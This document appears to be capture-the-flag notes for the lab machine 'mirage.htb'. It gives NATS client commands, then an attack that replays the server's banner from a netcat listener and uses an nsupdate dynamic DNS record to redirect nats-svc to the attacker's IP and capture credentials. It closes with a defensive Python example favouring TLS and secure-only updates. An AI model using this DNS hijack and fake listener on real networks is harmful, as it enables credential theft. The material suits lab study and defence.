NATS
- To get account info
└─$ nats account info -s nats://$IP:4222 --user $USER --password '$PASS'
- To list streams
└─$ nats stream ls -s nats://$IP:4222 --user $USER --password '$PASS'
- To view the stream
└─$ nats stream -s nats://$IP:4222 --user $USER --password '$PASS' view

Hijacking nats-svc.mirage.htb via Dynamic DNS Update
└─$ nc nats-svc.mirage.htb 4222
INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":832,"client_ip":"10.10.16.7","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"} 
-ERR 'Authentication Timeout'
- We started a listener on port 4222 (default NATS port):
└─$ echo 'INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","server_name":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":280,"client_ip":"10.129.248.59","xkey":"XBZCN2J5PXXZKRARPYRMZDVKMUIYINPFJGAG5HDA62RTA5HJ77MRPBEV"}' | nc -lvnp 4222
listening on [any] 4222 ...
#tldr
This sends a fake INFO banner (expected by NATS clients).
We're using Netcat (nc) to passively accept connections and reply.
- Hijack nats-svc.mirage.htb via Dynamic DNS
└─$ nsupdate                  
> server mirage.htb
> zone mirage.htb 
> update add nats-svc.mirage.htb 3600 A 10.10.16.7
> send
> quit
This sends a DNS dynamic update, making nats-svc.mirage.htb resolve to our IP (10.10.16.7) instead of the real NATS server.
⚠️ Requires that the DNS server allows "nonsecure and secure" dynamic updates (as stated in the incident report).
After some time, we will get the credentials.
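From the defender's side, the two banners above differ only in per-connection fields, so nothing in a plaintext INFO line identifies the server; only a certificate-verified TLS handshake does. The following is an added example, not part of the original notes: `parse_info`, `static_fields`, `connect_decision` and the policy they encode are assumptions of this example, and the banner carries a subset of the fields shown on the page.

```python
import json

# Subset of the banner fields shown on the page; only client_id/client_ip vary.
TEMPLATE = ('INFO {"server_id":"NBBDG7EENJOUNKBCOERCNKVWUMXKEFXEIMNQIIVNL5AYWADYM6357W5F",'
            '"version":"2.11.3","host":"0.0.0.0","port":4222,"auth_required":true,'
            '"jetstream":true,"client_id":%d,"client_ip":"%s"}')
REAL = TEMPLATE % (832, "10.10.16.7")         # reply from the real server
REPLAYED = TEMPLATE % (280, "10.129.248.59")  # banner echoed by the nc listener
# Constructed sample: banner of a server that requires TLS.
TLS_BANNER = 'INFO {"server_id":"EXAMPLE","auth_required":true,"tls_required":true}'

PER_CONNECTION = {"client_id", "client_ip"}   # set per client, not server identity


def parse_info(line):
    """Parse one NATS 'INFO {json}' protocol line into a dict."""
    op, _, payload = line.strip().partition(" ")
    if op != "INFO" or not payload:
        raise ValueError("not a NATS INFO line")
    info = json.loads(payload)
    if not isinstance(info, dict):
        raise ValueError("INFO payload must be a JSON object")
    return info


def static_fields(line):
    """Banner fields that remain after dropping the per-connection ones."""
    return {k: v for k, v in parse_info(line).items() if k not in PER_CONNECTION}


def connect_decision(line, tls_verified=False):
    """Hypothetical client policy: may user/password go into CONNECT?"""
    info = parse_info(line)
    if tls_verified:
        return "connect"      # peer already proved its identity with a certificate
    if info.get("tls_required"):
        return "upgrade-tls"  # handshake and verify the certificate before CONNECT
    if info.get("auth_required"):
        return "refuse"       # cleartext password to whoever answers for the name
    return "connect"          # no credentials are requested


if __name__ == "__main__":
    print("banners indistinguishable:", static_fields(REAL) == static_fields(REPLAYED))
    for name, line in (("real", REAL), ("replayed", REPLAYED), ("tls", TLS_BANNER)):
        print(name, "->", connect_decision(line))
```

Clients that connect with a verified TLS configuration, together with a zone that accepts secure-only dynamic updates, close both halves of the path described above.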